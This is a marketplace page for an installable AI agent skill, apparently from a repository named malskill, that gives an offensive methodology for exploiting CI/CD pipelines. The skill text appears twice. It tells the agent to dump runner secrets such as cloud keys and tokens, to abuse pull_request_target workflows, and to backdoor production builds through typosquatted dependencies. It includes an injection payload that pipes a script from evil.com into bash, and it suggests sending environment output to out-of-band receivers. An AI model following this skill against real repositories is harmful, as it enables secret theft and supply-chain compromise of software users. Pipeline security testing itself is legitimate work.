Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

aeondave/cicd-technique

Name: cicd-technique
Author: aeondave

offensive-techniques/cicd-technique/SKILL.md

npx skillsauth add aeondave/malskill cicd-technique

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

cicd-technique

Goal: Exploit CI/CD pipelines (GitHub Actions, GitLab CI, Jenkins) to achieve code execution in runners, extract pipeline secrets, or backdoor production artifacts.

When this technique applies

Evaluating a repository for supply chain vulnerabilities.
Gained access to a repository with write permissions to Pull Requests, Issues, or Wiki.
Compromised a CI/CD runner container.

The Execution Workflow

1. Runner Context Enumeration

If you achieved execution within a pipeline step (e.g., via Poisoned PR):

Dump secrets: Run env, search for AWS_ACCESS_KEY_ID, GITHUB_TOKEN, or $NPM_TOKEN.
Identity: For GitHub, investigate ACTIONS_ID_TOKEN_REQUEST_URL for OIDC (OpenID Connect) trust to AWS/GCP/Azure.

2. Identifying Injection Vectors

Review the pipeline configuration files (.github/workflows/*.yml, .gitlab-ci.yml, Jenkinsfile).

Untrusted Input in Scripts: Look for run: blocks that echo/execute issues names, PR titles, or commit messages without sanitization:
```
- run: echo "Checking PR title: ${{ github.event.pull_request.title }}"
```
(A PR titled "; curl http://evil.com/shell.sh | bash; " will execute).
pull_request_target Abuse: Workflows using pull_request_target run with elevated repository permissions. If they check out untrusted PR code and run npm install or make, the attacker obtains high-privileged execution.

3. Pipeline Poisoning (Artifacts)

Identify if the pipeline builds the production Docker image or binaries.
If you can push code or control dependencies (e.g., typosquatting package.json), you can implant backdoors natively into the production deployment cycle.

Quality Gates

Beware of Production Impact: Do not blindly merge poisoned Pull Requests into main. Injecting shellcode into a build pipeline will trigger incident response or deploy malware to live customers. Keep proofs restricted to harmless env | grep outputs sent to external burp collaborators or out-of-band receivers.
Avoid Credential Rolling: Only read CI/CD secrets. Do NOT rotate or regenerate them, as it will break the production pipeline completely.

aeondave/cicd-technique

offensive-techniques/cicd-technique/SKILL.md

CI/CD supply chain methodology: identifying poisoned pipelines, unsafe GitHub Actions, and extracting build secrets.

4 stars

development

Updated Jun 12, 2026

$ install --global

skillsauth

npx skillsauth add aeondave/malskill cicd-technique

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Jun 12, 2026, 3:50 AM9.5s1 file scanned

SKILL.md

name:: cicd-technique
description:: CI/CD supply chain methodology: identifying poisoned pipelines, unsafe GitHub Actions, and extracting build secrets.

cicd-technique

Goal: Exploit CI/CD pipelines (GitHub Actions, GitLab CI, Jenkins) to achieve code execution in runners, extract pipeline secrets, or backdoor production artifacts.

When this technique applies

Evaluating a repository for supply chain vulnerabilities.
Gained access to a repository with write permissions to Pull Requests, Issues, or Wiki.
Compromised a CI/CD runner container.

The Execution Workflow

1. Runner Context Enumeration

If you achieved execution within a pipeline step (e.g., via Poisoned PR):

Dump secrets: Run env, search for AWS_ACCESS_KEY_ID, GITHUB_TOKEN, or $NPM_TOKEN.
Identity: For GitHub, investigate ACTIONS_ID_TOKEN_REQUEST_URL for OIDC (OpenID Connect) trust to AWS/GCP/Azure.

2. Identifying Injection Vectors

Review the pipeline configuration files (.github/workflows/*.yml, .gitlab-ci.yml, Jenkinsfile).

Untrusted Input in Scripts: Look for run: blocks that echo/execute issues names, PR titles, or commit messages without sanitization:
```
- run: echo "Checking PR title: ${{ github.event.pull_request.title }}"
```
(A PR titled "; curl http://evil.com/shell.sh | bash; " will execute).
pull_request_target Abuse: Workflows using pull_request_target run with elevated repository permissions. If they check out untrusted PR code and run npm install or make, the attacker obtains high-privileged execution.

3. Pipeline Poisoning (Artifacts)

Identify if the pipeline builds the production Docker image or binaries.
If you can push code or control dependencies (e.g., typosquatting package.json), you can implant backdoors natively into the production deployment cycle.

Quality Gates

Beware of Production Impact: Do not blindly merge poisoned Pull Requests into main. Injecting shellcode into a build pipeline will trigger incident response or deploy malware to live customers. Keep proofs restricted to harmless env | grep outputs sent to external burp collaborators or out-of-band receivers.
Avoid Credential Rolling: Only read CI/CD secrets. Do NOT rotate or regenerate them, as it will break the production pipeline completely.

Related Skills

aeondave/vibe-audit-technique

development

VerifiedTrustedCommunity

White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).

4SKILL.mdUpdated Jun 12, 2026

aeondave/vibe-audit-technique

aeondave/source-review-technique

development

VerifiedTrustedCommunity

Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.

4SKILL.mdUpdated Jun 12, 2026

aeondave/source-review-technique

aeondave/hardware-technique

development

VerifiedTrustedCommunity

Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.

4SKILL.mdUpdated Jun 12, 2026

aeondave/hardware-technique

aeondave/container-technique

devops

VerifiedTrustedCommunity

Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.

4SKILL.mdUpdated Jun 12, 2026

aeondave/container-technique

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/aeondave/malskill.git

# Copy into Claude Code skills folder (global)
cp -r malskill/offensive-techniques/cicd-technique ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

aeondave/malskill

4 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT